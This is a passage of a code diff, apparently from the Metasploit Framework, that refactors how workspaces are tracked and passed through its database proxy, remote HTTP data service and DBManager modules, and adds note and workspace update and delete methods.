||||||
|
add_opts_workspace(opts)
|
||||||
data_service.report_service(opts)
|
data_service.report_service(opts)
|
||||||
rescue Exception => e
|
rescue Exception => e
|
||||||
self.log_error(e, 'Problem reporting service')
|
self.log_error(e, 'Problem reporting service')
|
||||||
|
@ -25,7 +26,7 @@ module ServiceDataProxy
|
||||||
|
|
||||||
def update_service(opts)
|
def update_service(opts)
|
||||||
begin
|
begin
|
||||||
data_service = self.get_data_service()
|
data_service = self.get_data_service
|
||||||
data_service.update_service(opts)
|
data_service.update_service(opts)
|
||||||
rescue Exception => e
|
rescue Exception => e
|
||||||
self.log_error(e, 'Problem updating service')
|
self.log_error(e, 'Problem updating service')
|
||||||
|
@ -34,7 +35,7 @@ module ServiceDataProxy
|
||||||
|
|
||||||
def delete_service(opts)
|
def delete_service(opts)
|
||||||
begin
|
begin
|
||||||
data_service = self.get_data_service()
|
data_service = self.get_data_service
|
||||||
data_service.delete_service(opts)
|
data_service.delete_service(opts)
|
||||||
rescue Exception => e
|
rescue Exception => e
|
||||||
self.log_error(e, 'Problem deleting service')
|
self.log_error(e, 'Problem deleting service')
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
module SessionDataProxy
|
module SessionDataProxy
|
||||||
def report_session(opts)
|
def report_session(opts)
|
||||||
begin
|
begin
|
||||||
data_service = self.get_data_service()
|
data_service = self.get_data_service
|
||||||
data_service.report_session(opts)
|
data_service.report_session(opts)
|
||||||
rescue Exception => e
|
rescue Exception => e
|
||||||
self.log_error(e, "Problem reporting session")
|
self.log_error(e, "Problem reporting session")
|
||||||
|
|
|
@ -2,7 +2,7 @@ module VulnAttemptDataProxy
|
||||||
|
|
||||||
def vuln_attempts(opts)
|
def vuln_attempts(opts)
|
||||||
begin
|
begin
|
||||||
data_service = self.get_data_service()
|
data_service = self.get_data_service
|
||||||
data_service.vuln_attempts(opts)
|
data_service.vuln_attempts(opts)
|
||||||
rescue Exception => e
|
rescue Exception => e
|
||||||
self.log_error(e, "Problem retrieving vulnerability attempts")
|
self.log_error(e, "Problem retrieving vulnerability attempts")
|
||||||
|
@ -11,7 +11,8 @@ module VulnAttemptDataProxy
|
||||||
|
|
||||||
def report_vuln_attempt(vuln, opts)
|
def report_vuln_attempt(vuln, opts)
|
||||||
begin
|
begin
|
||||||
data_service = self.get_data_service()
|
data_service = self.get_data_service
|
||||||
|
add_opts_workspace(opts)
|
||||||
data_service.report_vuln_attempt(vuln, opts)
|
data_service.report_vuln_attempt(vuln, opts)
|
||||||
rescue Exception => e
|
rescue Exception => e
|
||||||
self.log_error(e, "Problem reporting vulnerability attempts")
|
self.log_error(e, "Problem reporting vulnerability attempts")
|
||||||
|
|
|
@ -3,7 +3,8 @@ module VulnDataProxy
|
||||||
|
|
||||||
def vulns(opts)
|
def vulns(opts)
|
||||||
begin
|
begin
|
||||||
data_service = self.get_data_service()
|
data_service = self.get_data_service
|
||||||
|
add_opts_workspace(opts)
|
||||||
data_service.vulns(opts)
|
data_service.vulns(opts)
|
||||||
rescue Exception => e
|
rescue Exception => e
|
||||||
self.log_error(e, "Problem retrieving vulns")
|
self.log_error(e, "Problem retrieving vulns")
|
||||||
|
@ -12,7 +13,8 @@ module VulnDataProxy
|
||||||
|
|
||||||
def report_vuln(opts)
|
def report_vuln(opts)
|
||||||
begin
|
begin
|
||||||
data_service = self.get_data_service()
|
data_service = self.get_data_service
|
||||||
|
add_opts_workspace(opts)
|
||||||
data_service.report_vuln(opts)
|
data_service.report_vuln(opts)
|
||||||
rescue Exception => e
|
rescue Exception => e
|
||||||
self.log_error(e, "Problem reporting vuln")
|
self.log_error(e, "Problem reporting vuln")
|
||||||
|
@ -21,7 +23,7 @@ module VulnDataProxy
|
||||||
|
|
||||||
def update_vuln(opts)
|
def update_vuln(opts)
|
||||||
begin
|
begin
|
||||||
data_service = self.get_data_service()
|
data_service = self.get_data_service
|
||||||
data_service.update_vuln(opts)
|
data_service.update_vuln(opts)
|
||||||
rescue Exception => e
|
rescue Exception => e
|
||||||
self.log_error(e, "Problem updating vuln")
|
self.log_error(e, "Problem updating vuln")
|
||||||
|
@ -30,7 +32,7 @@ module VulnDataProxy
|
||||||
|
|
||||||
def delete_vuln(opts)
|
def delete_vuln(opts)
|
||||||
begin
|
begin
|
||||||
data_service = self.get_data_service()
|
data_service = self.get_data_service
|
||||||
data_service.delete_vuln(opts)
|
data_service.delete_vuln(opts)
|
||||||
rescue Exception => e
|
rescue Exception => e
|
||||||
self.log_error(e, "Problem deleting vuln")
|
self.log_error(e, "Problem deleting vuln")
|
||||||
|
|
|
@ -2,8 +2,9 @@ module WorkspaceDataProxy
|
||||||
|
|
||||||
def find_workspace(workspace_name)
|
def find_workspace(workspace_name)
|
||||||
begin
|
begin
|
||||||
data_service = self.get_data_service()
|
data_service = self.get_data_service
|
||||||
data_service.find_workspace(workspace_name)
|
opts = { name: workspace_name }
|
||||||
|
data_service.workspaces(opts).first
|
||||||
rescue Exception => e
|
rescue Exception => e
|
||||||
self.log_error(e, "Problem finding workspace")
|
self.log_error(e, "Problem finding workspace")
|
||||||
end
|
end
|
||||||
|
@ -11,8 +12,9 @@ module WorkspaceDataProxy
|
||||||
|
|
||||||
def add_workspace(workspace_name)
|
def add_workspace(workspace_name)
|
||||||
begin
|
begin
|
||||||
data_service = self.get_data_service()
|
data_service = self.get_data_service
|
||||||
data_service.add_workspace(workspace_name)
|
opts = { name: workspace_name }
|
||||||
|
data_service.add_workspace(opts)
|
||||||
rescue Exception => e
|
rescue Exception => e
|
||||||
self.log_error(e, "Problem adding workspace")
|
self.log_error(e, "Problem adding workspace")
|
||||||
end
|
end
|
||||||
|
@ -20,8 +22,11 @@ module WorkspaceDataProxy
|
||||||
|
|
||||||
def default_workspace
|
def default_workspace
|
||||||
begin
|
begin
|
||||||
data_service = self.get_data_service()
|
ws = find_workspace(Msf::DBManager::Workspace::DEFAULT_WORKSPACE_NAME)
|
||||||
data_service.default_workspace
|
if ws.nil?
|
||||||
|
ws = add_workspace(Msf::DBManager::Workspace::DEFAULT_WORKSPACE_NAME)
|
||||||
|
end
|
||||||
|
ws
|
||||||
rescue Exception => e
|
rescue Exception => e
|
||||||
self.log_error(e, "Problem finding default workspace")
|
self.log_error(e, "Problem finding default workspace")
|
||||||
end
|
end
|
||||||
|
@ -29,38 +34,52 @@ module WorkspaceDataProxy
|
||||||
|
|
||||||
def workspace
|
def workspace
|
||||||
begin
|
begin
|
||||||
data_service = self.get_data_service()
|
if @current_workspace
|
||||||
data_service.workspace
|
@current_workspace
|
||||||
|
else
|
||||||
|
# This is mostly a failsafe to prevent bad things from happening. @current_workspace should always be set
|
||||||
|
# outside of here, but this will save us from crashes/infinite loops if that happens
|
||||||
|
warn "@current_workspace was not set. Setting to default_workspace: #{default_workspace.name}"
|
||||||
|
@current_workspace = default_workspace
|
||||||
|
end
|
||||||
rescue Exception => e
|
rescue Exception => e
|
||||||
self.log_error(e, "Problem retrieving workspace")
|
self.log_error(e, "Problem retrieving workspace")
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# TODO: Tracking of the current workspace should be moved out of the datastore. See MS-3095.
|
||||||
def workspace=(workspace)
|
def workspace=(workspace)
|
||||||
begin
|
begin
|
||||||
data_service = self.get_data_service()
|
@current_workspace = workspace
|
||||||
data_service.workspace = workspace
|
|
||||||
rescue Exception => e
|
rescue Exception => e
|
||||||
self.log_error(e, "Problem setting workspace")
|
self.log_error(e, "Problem setting workspace")
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
def workspaces
|
def workspaces(opts = {})
|
||||||
begin
|
begin
|
||||||
data_service = self.get_data_service()
|
data_service = self.get_data_service
|
||||||
data_service.workspaces
|
data_service.workspaces(opts)
|
||||||
rescue Exception => e
|
rescue Exception => e
|
||||||
self.log_error(e, "Problem retrieving workspaces")
|
self.log_error(e, "Problem retrieving workspaces")
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
def workspace_associations_counts()
|
def delete_workspaces(opts)
|
||||||
begin
|
begin
|
||||||
data_service = self.get_data_service()
|
data_service = self.get_data_service
|
||||||
data_service.workspace_associations_counts()
|
data_service.delete_workspaces(opts)
|
||||||
rescue Exception => e
|
rescue Exception => e
|
||||||
self.log_error(e, "Problem retrieving workspace counts")
|
self.log_error(e, "Problem deleting workspaces")
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def update_workspace(opts)
|
||||||
|
begin
|
||||||
|
data_service = self.get_data_service
|
||||||
|
data_service.update_workspace(opts)
|
||||||
|
rescue Exception => e
|
||||||
|
self.log_error(e, "Problem updating workspace")
|
||||||
|
end
|
||||||
|
end
|
||||||
end
|
end
|
|
@ -24,10 +24,11 @@ class RemoteHTTPDataService
|
||||||
#
|
#
|
||||||
# @param [String] endpoint A valid http or https URL. Cannot be nil
|
# @param [String] endpoint A valid http or https URL. Cannot be nil
|
||||||
#
|
#
|
||||||
def initialize(endpoint, https_opts = {})
|
def initialize(endpoint, framework, https_opts = {})
|
||||||
validate_endpoint(endpoint)
|
validate_endpoint(endpoint)
|
||||||
@endpoint = URI.parse(endpoint)
|
@endpoint = URI.parse(endpoint)
|
||||||
@https_opts = https_opts
|
@https_opts = https_opts
|
||||||
|
@framework = framework
|
||||||
build_client_pool(5)
|
build_client_pool(5)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -121,11 +122,11 @@ class RemoteHTTPDataService
|
||||||
def make_request(request_type, path, data_hash = nil, query = nil)
|
def make_request(request_type, path, data_hash = nil, query = nil)
|
||||||
begin
|
begin
|
||||||
# simplify query by removing nil values
|
# simplify query by removing nil values
|
||||||
query_str = (!query.nil? && !query.empty?) ? append_workspace(query).compact.to_query : nil
|
query_str = (!query.nil? && !query.empty?) ? query.compact.to_query : nil
|
||||||
uri = URI::HTTP::build({path: path, query: query_str})
|
uri = URI::HTTP::build({path: path, query: query_str})
|
||||||
dlog("HTTP #{request_type} request to #{uri.request_uri} with #{data_hash ? data_hash : "nil"}")
|
dlog("HTTP #{request_type} request to #{uri.request_uri} with #{data_hash ? data_hash : "nil"}")
|
||||||
|
|
||||||
client = @client_pool.pop()
|
client = @client_pool.pop
|
||||||
case request_type
|
case request_type
|
||||||
when GET_REQUEST
|
when GET_REQUEST
|
||||||
request = Net::HTTP::Get.new(uri.request_uri)
|
request = Net::HTTP::Get.new(uri.request_uri)
|
||||||
|
@ -223,19 +224,6 @@ class RemoteHTTPDataService
|
||||||
raise 'Endpoint cannot be nil' if endpoint.nil?
|
raise 'Endpoint cannot be nil' if endpoint.nil?
|
||||||
end
|
end
|
||||||
|
|
||||||
def append_workspace(data_hash)
|
|
||||||
workspace = data_hash[:workspace]
|
|
||||||
workspace = data_hash.delete(:wspace) unless workspace
|
|
||||||
|
|
||||||
if workspace && (workspace.is_a?(OpenStruct) || workspace.is_a?(::Mdm::Workspace))
|
|
||||||
data_hash[:workspace] = workspace.name
|
|
||||||
end
|
|
||||||
|
|
||||||
data_hash[:workspace] = current_workspace_name if workspace.nil?
|
|
||||||
|
|
||||||
data_hash
|
|
||||||
end
|
|
||||||
|
|
||||||
def build_request(request, data_hash)
|
def build_request(request, data_hash)
|
||||||
request.content_type = 'application/json'
|
request.content_type = 'application/json'
|
||||||
if !data_hash.nil? && !data_hash.empty?
|
if !data_hash.nil? && !data_hash.empty?
|
||||||
|
@ -248,7 +236,7 @@ class RemoteHTTPDataService
|
||||||
data_hash.delete(k)
|
data_hash.delete(k)
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
json_body = append_workspace(data_hash).to_json
|
json_body = data_hash.to_json
|
||||||
request.body = json_body
|
request.body = json_body
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -4,8 +4,26 @@ module RemoteNoteDataService
|
||||||
include ResponseDataHelper
|
include ResponseDataHelper
|
||||||
|
|
||||||
NOTE_API_PATH = '/api/v1/notes'
|
NOTE_API_PATH = '/api/v1/notes'
|
||||||
|
NOTE_MDM_CLASS = 'Mdm::Note'
|
||||||
|
|
||||||
|
def notes(opts)
|
||||||
|
json_to_mdm_object(self.get_data(NOTE_API_PATH, nil, opts), NOTE_MDM_CLASS, [])
|
||||||
|
end
|
||||||
|
|
||||||
def report_note(opts)
|
def report_note(opts)
|
||||||
self.post_data_async(NOTE_API_PATH, opts)
|
json_to_mdm_object(self.post_data(NOTE_API_PATH, opts), NOTE_MDM_CLASS, []).first
|
||||||
|
end
|
||||||
|
|
||||||
|
def update_note(opts)
|
||||||
|
path = NOTE_API_PATH
|
||||||
|
if opts && opts[:id]
|
||||||
|
id = opts.delete(:id)
|
||||||
|
path = "#{NOTE_API_PATH}/#{id}"
|
||||||
|
end
|
||||||
|
json_to_mdm_object(self.put_data(path, opts), NOTE_MDM_CLASS, [])
|
||||||
|
end
|
||||||
|
|
||||||
|
def delete_note(opts)
|
||||||
|
json_to_mdm_object(self.delete_data(NOTE_API_PATH, opts), NOTE_MDM_CLASS, [])
|
||||||
end
|
end
|
||||||
end
|
end
|
|
@ -3,55 +3,49 @@ require 'metasploit/framework/data_service/remote/http/response_data_helper'
|
||||||
module RemoteWorkspaceDataService
|
module RemoteWorkspaceDataService
|
||||||
include ResponseDataHelper
|
include ResponseDataHelper
|
||||||
|
|
||||||
# TODO: should counts be a flag in query data for the workspaces resource?
|
|
||||||
WORKSPACE_COUNTS_API_PATH = '/api/v1/workspaces/counts'
|
|
||||||
WORKSPACE_API_PATH = '/api/v1/workspaces'
|
WORKSPACE_API_PATH = '/api/v1/workspaces'
|
||||||
WORKSPACE_MDM_CLASS = 'Mdm::Workspace'
|
WORKSPACE_MDM_CLASS = 'Mdm::Workspace'
|
||||||
DEFAULT_WORKSPACE_NAME = 'default'
|
|
||||||
|
|
||||||
def find_workspace(workspace_name)
|
def add_workspace(opts)
|
||||||
workspace = workspace_cache[workspace_name]
|
response = self.post_data(WORKSPACE_API_PATH, opts)
|
||||||
return workspace unless (workspace.nil?)
|
json_to_mdm_object(response, WORKSPACE_MDM_CLASS, nil).first
|
||||||
|
|
||||||
workspace = json_to_mdm_object(self.get_data(WORKSPACE_API_PATH, {:workspace_name => workspace_name}), WORKSPACE_MDM_CLASS).first
|
|
||||||
workspace_cache[workspace_name] = workspace
|
|
||||||
end
|
|
||||||
|
|
||||||
def add_workspace(workspace_name)
|
|
||||||
response = self.post_data(WORKSPACE_API_PATH, {:workspace_name => workspace_name})
|
|
||||||
json_to_mdm_object(response, WORKSPACE_MDM_CLASS, nil)
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def default_workspace
|
def default_workspace
|
||||||
find_workspace(DEFAULT_WORKSPACE_NAME)
|
json_to_mdm_object(self.get_data(WORKSPACE_API_PATH, nil, { name: Msf::DBManager::Workspace::DEFAULT_WORKSPACE_NAME }), WORKSPACE_MDM_CLASS, [])
|
||||||
end
|
end
|
||||||
|
|
||||||
def workspace
|
def workspace
|
||||||
find_workspace(current_workspace_name)
|
# The @current_workspace is tracked on the client side, so attempting to call it directly from the RemoteDataService
|
||||||
|
# will not return the correct results. Run it back through the proxy.
|
||||||
|
wlog "[DEPRECATION] Calling workspace from within the RemoteDataService is no longer supported. Please call from WorkspaceDataProxy instead."
|
||||||
|
caller.each { |line| wlog "#{line}"}
|
||||||
|
framework.db.workspace
|
||||||
end
|
end
|
||||||
|
|
||||||
def workspace=(workspace)
|
def workspace=(workspace)
|
||||||
@current_workspace_name = workspace.name
|
# The @current_workspace is tracked on the client side, so attempting to call it directly from the RemoteDataService
|
||||||
|
# will not return the correct results. Run it back through the proxy.
|
||||||
|
wlog "[DEPRECATION] Setting the current workspace from the RemoteDataService is no longer supported. Please call from WorkspaceDataProxy instead."
|
||||||
|
caller.each { |line| wlog "#{line}"}
|
||||||
|
framework.db.workspace = workspace
|
||||||
end
|
end
|
||||||
|
|
||||||
def workspaces
|
def workspaces(opts)
|
||||||
json_to_mdm_object(self.get_data(WORKSPACE_API_PATH, {:all => true}), WORKSPACE_MDM_CLASS, [])
|
json_to_mdm_object(self.get_data(WORKSPACE_API_PATH, nil, opts), WORKSPACE_MDM_CLASS, [])
|
||||||
end
|
end
|
||||||
|
|
||||||
def workspace_associations_counts()
|
def delete_workspaces(opts)
|
||||||
json_to_mdm_object(self.get_data(WORKSPACE_COUNTS_API_PATH, []), WORKSPACE_MDM_CLASS, [])
|
json_to_mdm_object(self.delete_data(WORKSPACE_API_PATH, opts), WORKSPACE_MDM_CLASS, [])
|
||||||
end
|
end
|
||||||
|
|
||||||
#########
|
def update_workspace(opts)
|
||||||
protected
|
path = WORKSPACE_API_PATH
|
||||||
#########
|
if opts && opts[:id]
|
||||||
|
id = opts.delete(:id)
|
||||||
def workspace_cache
|
path = "#{WORKSPACE_API_PATH}/#{id}"
|
||||||
@workspace_cache ||= {}
|
end
|
||||||
end
|
json_to_mdm_object(self.put_data(path, opts), WORKSPACE_MDM_CLASS, []).first
|
||||||
|
|
||||||
def current_workspace_name
|
|
||||||
@current_workspace_name ||= DEFAULT_WORKSPACE_NAME
|
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
|
@ -1,7 +1,19 @@
|
||||||
module NoteDataService
|
module NoteDataService
|
||||||
|
|
||||||
|
def notes(opts)
|
||||||
|
raise NotImplementedError, 'NoteDataService#notes is not implemented'
|
||||||
|
end
|
||||||
|
|
||||||
def report_note(opts)
|
def report_note(opts)
|
||||||
raise 'NoteDataService#report_note is not implemented'
|
raise NotImplementedError, 'NoteDataService#report_note is not implemented'
|
||||||
|
end
|
||||||
|
|
||||||
|
def update_note(opts)
|
||||||
|
raise NotImplementedError, 'NoteDataService#update_note is not implemented'
|
||||||
|
end
|
||||||
|
|
||||||
|
def delete_note(opts)
|
||||||
|
raise NotImplementedError, 'NoteDataService#delete_note is not implemented'
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
|
@ -27,9 +27,4 @@ module WorkspaceDataService
|
||||||
def workspace_associations_counts()
|
def workspace_associations_counts()
|
||||||
raise 'WorkspaceDataService#workspace_associations_counts is not implemented'
|
raise 'WorkspaceDataService#workspace_associations_counts is not implemented'
|
||||||
end
|
end
|
||||||
|
|
||||||
def rename_workspace(from_name, to_name)
|
|
||||||
raise 'WorkspaceDataService#rename_workspace is not implemented'
|
|
||||||
end
|
|
||||||
|
|
||||||
end
|
end
|
|
@ -98,6 +98,11 @@ module Exploit
|
||||||
# best encoder.
|
# best encoder.
|
||||||
exploit.datastore['ENCODER'] = opts['Encoder'] if opts['Encoder']
|
exploit.datastore['ENCODER'] = opts['Encoder'] if opts['Encoder']
|
||||||
|
|
||||||
|
# Use the supplied NOP generator, if any. If one was not specified, then
|
||||||
|
# nil will be assigned causing the exploit to default to picking a
|
||||||
|
# compatible NOP generator.
|
||||||
|
exploit.datastore['NOP'] = opts['Nop'] if opts['Nop']
|
||||||
|
|
||||||
# Force the payload to share the exploit's datastore
|
# Force the payload to share the exploit's datastore
|
||||||
driver.payload.share_datastore(driver.exploit.datastore)
|
driver.payload.share_datastore(driver.exploit.datastore)
|
||||||
|
|
||||||
|
|
|
@ -16,9 +16,6 @@ module Msf::DBManager::Connection
|
||||||
begin
|
begin
|
||||||
# Migrate the database, if needed
|
# Migrate the database, if needed
|
||||||
migrate
|
migrate
|
||||||
|
|
||||||
# Set the default workspace
|
|
||||||
self.workspace = self.default_workspace
|
|
||||||
rescue ::Exception => exception
|
rescue ::Exception => exception
|
||||||
self.error = exception
|
self.error = exception
|
||||||
elog("DB.connect threw an exception: #{exception}")
|
elog("DB.connect threw an exception: #{exception}")
|
||||||
|
|
|
@ -2,8 +2,9 @@ module Msf::DBManager::Cred
|
||||||
# This methods returns a list of all credentials in the database
|
# This methods returns a list of all credentials in the database
|
||||||
def creds(opts)
|
def creds(opts)
|
||||||
query = nil
|
query = nil
|
||||||
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
query = Metasploit::Credential::Core.where( workspace_id: framework.db.workspace.id )
|
query = Metasploit::Credential::Core.where( workspace_id: wspace.id )
|
||||||
query = query.includes(:private, :public, :logins).references(:private, :public, :logins)
|
query = query.includes(:private, :public, :logins).references(:private, :public, :logins)
|
||||||
query = query.includes(logins: [ :service, { service: :host } ])
|
query = query.includes(logins: [ :service, { service: :host } ])
|
||||||
|
|
||||||
|
@ -40,7 +41,7 @@ module Msf::DBManager::Cred
|
||||||
|
|
||||||
# This method iterates the creds table calling the supplied block with the
|
# This method iterates the creds table calling the supplied block with the
|
||||||
# cred instance of each entry.
|
# cred instance of each entry.
|
||||||
def each_cred(wspace=workspace,&block)
|
def each_cred(wspace=framework.db.workspace,&block)
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
wspace.creds.each do |cred|
|
wspace.creds.each do |cred|
|
||||||
block.call(cred)
|
block.call(cred)
|
||||||
|
@ -106,7 +107,7 @@ module Msf::DBManager::Cred
|
||||||
# Nil is true for active.
|
# Nil is true for active.
|
||||||
active = (opts[:active] || opts[:active].nil?) ? true : false
|
active = (opts[:active] || opts[:active].nil?) ? true : false
|
||||||
|
|
||||||
wspace = opts.delete(:workspace) || workspace
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||||
|
|
||||||
# Service management; assume the user knows what
|
# Service management; assume the user knows what
|
||||||
# he's talking about.
|
# he's talking about.
|
||||||
|
|
|
@ -2,7 +2,8 @@ require 'msf/core/db_export'
|
||||||
|
|
||||||
module Msf::DBManager::DbExport
|
module Msf::DBManager::DbExport
|
||||||
def run_db_export(opts)
|
def run_db_export(opts)
|
||||||
exporter = Msf::DBManager::Export.new(framework.db.workspace)
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||||
|
exporter = Msf::DBManager::Export.new(wspace)
|
||||||
|
|
||||||
output_file = exporter.send("to_#{opts[:format]}_file".intern, opts[:path]) do |mtype, mstatus, mname|
|
output_file = exporter.send("to_#{opts[:format]}_file".intern, opts[:path]) do |mtype, mstatus, mname|
|
||||||
if mtype == :status
|
if mtype == :status
|
||||||
|
|
|
@ -8,7 +8,7 @@ module Msf::DBManager::Event
|
||||||
def report_event(opts = {})
|
def report_event(opts = {})
|
||||||
return if not active
|
return if not active
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
wspace = get_workspace(opts)
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||||
return if not wspace # Temp fix?
|
return if not wspace # Temp fix?
|
||||||
uname = opts.delete(:username)
|
uname = opts.delete(:username)
|
||||||
|
|
||||||
|
|
|
@ -36,7 +36,7 @@ module Msf::DBManager::ExploitAttempt
|
||||||
return unless opts.has_key?(:refs) && !opts[:refs].blank?
|
return unless opts.has_key?(:refs) && !opts[:refs].blank?
|
||||||
host = opts[:host] || return
|
host = opts[:host] || return
|
||||||
|
|
||||||
wspace = opts[:workspace] || workspace
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||||
port = opts[:port]
|
port = opts[:port]
|
||||||
prot = opts[:proto] || Msf::DBManager::DEFAULT_SERVICE_PROTO
|
prot = opts[:proto] || Msf::DBManager::DEFAULT_SERVICE_PROTO
|
||||||
svc = opts[:service]
|
svc = opts[:service]
|
||||||
|
@ -73,7 +73,7 @@ module Msf::DBManager::ExploitAttempt
|
||||||
return unless opts[:refs]
|
return unless opts[:refs]
|
||||||
host = opts[:host] || return
|
host = opts[:host] || return
|
||||||
|
|
||||||
wspace = opts[:workspace] || workspace
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||||
port = opts[:port]
|
port = opts[:port]
|
||||||
prot = opts[:proto] || Msf::DBManager::DEFAULT_SERVICE_PROTO
|
prot = opts[:proto] || Msf::DBManager::DEFAULT_SERVICE_PROTO
|
||||||
svc = opts[:service]
|
svc = opts[:service]
|
||||||
|
@ -222,7 +222,7 @@ module Msf::DBManager::ExploitAttempt
|
||||||
# @option opts [String] :username
|
# @option opts [String] :username
|
||||||
# @return [ MetasploitDataModels::AutomaticExploitation::Match, MetasploitDataModels::AutomaticExploitation::Run]
|
# @return [ MetasploitDataModels::AutomaticExploitation::Match, MetasploitDataModels::AutomaticExploitation::Run]
|
||||||
def create_match_for_vuln(vuln,opts)
|
def create_match_for_vuln(vuln,opts)
|
||||||
wspace = opts[:workspace] || workspace
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||||
run = opts[:run]
|
run = opts[:run]
|
||||||
module_fullname = opts[:module]
|
module_fullname = opts[:module]
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
module Msf::DBManager::ExploitedHost
|
module Msf::DBManager::ExploitedHost
|
||||||
def each_exploited_host(wspace=workspace,&block)
|
def each_exploited_host(wspace=framework.db.workspace,&block)
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
wspace.exploited_hosts.each do |eh|
|
wspace.exploited_hosts.each do |eh|
|
||||||
block.call(eh)
|
block.call(eh)
|
||||||
|
@ -8,7 +8,7 @@ module Msf::DBManager::ExploitedHost
|
||||||
end
|
end
|
||||||
|
|
||||||
# This method returns a list of all exploited hosts in the database.
|
# This method returns a list of all exploited hosts in the database.
|
||||||
def exploited_hosts(wspace=workspace)
|
def exploited_hosts(wspace=framework.db.workspace)
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
wspace.exploited_hosts
|
wspace.exploited_hosts
|
||||||
}
|
}
|
||||||
|
|
|
@ -36,7 +36,7 @@ module Msf::DBManager::Host
|
||||||
# Iterates over the hosts table calling the supplied block with the host
|
# Iterates over the hosts table calling the supplied block with the host
|
||||||
# instance of each entry.
|
# instance of each entry.
|
||||||
#
|
#
|
||||||
def each_host(wspace=workspace, &block)
|
def each_host(wspace=framework.db.workspace, &block)
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
wspace.hosts.each do |host|
|
wspace.hosts.each do |host|
|
||||||
block.call(host)
|
block.call(host)
|
||||||
|
@ -53,17 +53,14 @@ module Msf::DBManager::Host
|
||||||
end
|
end
|
||||||
|
|
||||||
def add_host_tag(opts)
|
def add_host_tag(opts)
|
||||||
workspace = opts[:workspace]
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||||
if workspace.kind_of? String
|
|
||||||
workspace = find_workspace(workspace)
|
|
||||||
end
|
|
||||||
|
|
||||||
ip = opts[:ip]
|
ip = opts[:ip]
|
||||||
tag_name = opts[:tag_name]
|
tag_name = opts[:tag_name]
|
||||||
|
|
||||||
host = framework.db.get_host(:workspace => workspace, :address => ip)
|
host = framework.db.get_host(:workspace => wspace, :address => ip)
|
||||||
if host
|
if host
|
||||||
possible_tags = Mdm::Tag.joins(:hosts).where("hosts.workspace_id = ? and hosts.address = ? and tags.name = ?", workspace.id, ip, tag_name).order("tags.id DESC").limit(1)
|
possible_tags = Mdm::Tag.joins(:hosts).where("hosts.workspace_id = ? and hosts.address = ? and tags.name = ?", wspace.id, ip, tag_name).order("tags.id DESC").limit(1)
|
||||||
tag = (possible_tags.blank? ? Mdm::Tag.new : possible_tags.first)
|
tag = (possible_tags.blank? ? Mdm::Tag.new : possible_tags.first)
|
||||||
tag.name = tag_name
|
tag.name = tag_name
|
||||||
tag.hosts = [host]
|
tag.hosts = [host]
|
||||||
|
@ -74,7 +71,7 @@ module Msf::DBManager::Host
|
||||||
def delete_host_tag(opts)
|
def delete_host_tag(opts)
|
||||||
workspace = opts[:workspace]
|
workspace = opts[:workspace]
|
||||||
if workspace.kind_of? String
|
if workspace.kind_of? String
|
||||||
workspace = find_workspace(workspace)
|
workspace = framework.db.find_workspace(workspace)
|
||||||
end
|
end
|
||||||
|
|
||||||
ip = opts[:rws]
|
ip = opts[:rws]
|
||||||
|
@ -113,10 +110,7 @@ module Msf::DBManager::Host
|
||||||
return address if address.kind_of? ::Mdm::Host
|
return address if address.kind_of? ::Mdm::Host
|
||||||
end
|
end
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
wspace = opts.delete(:workspace) || workspace
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||||
if wspace.kind_of? String
|
|
||||||
wspace = find_workspace(wspace)
|
|
||||||
end
|
|
||||||
|
|
||||||
address = Msf::Util::Host.normalize_host(address)
|
address = Msf::Util::Host.normalize_host(address)
|
||||||
return wspace.hosts.find_by_address(address)
|
return wspace.hosts.find_by_address(address)
|
||||||
|
@ -133,12 +127,8 @@ module Msf::DBManager::Host
|
||||||
|
|
||||||
# Returns a list of all hosts in the database
|
# Returns a list of all hosts in the database
|
||||||
def hosts(opts)
|
def hosts(opts)
|
||||||
wspace = opts[:workspace] || opts[:wspace] || workspace
|
|
||||||
if wspace.kind_of? String
|
|
||||||
wspace = find_workspace(wspace)
|
|
||||||
end
|
|
||||||
|
|
||||||
::ActiveRecord::Base.connection_pool.with_connection {
|
::ActiveRecord::Base.connection_pool.with_connection {
|
||||||
|
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||||
|
|
||||||
conditions = {}
|
conditions = {}
|
||||||
conditions[:state] = [Msf::HostState::Alive, Msf::HostState::Unknown] if opts[:non_dead]
|
conditions[:state] = [Msf::HostState::Alive, Msf::HostState::Unknown] if opts[:non_dead]
|
||||||
|
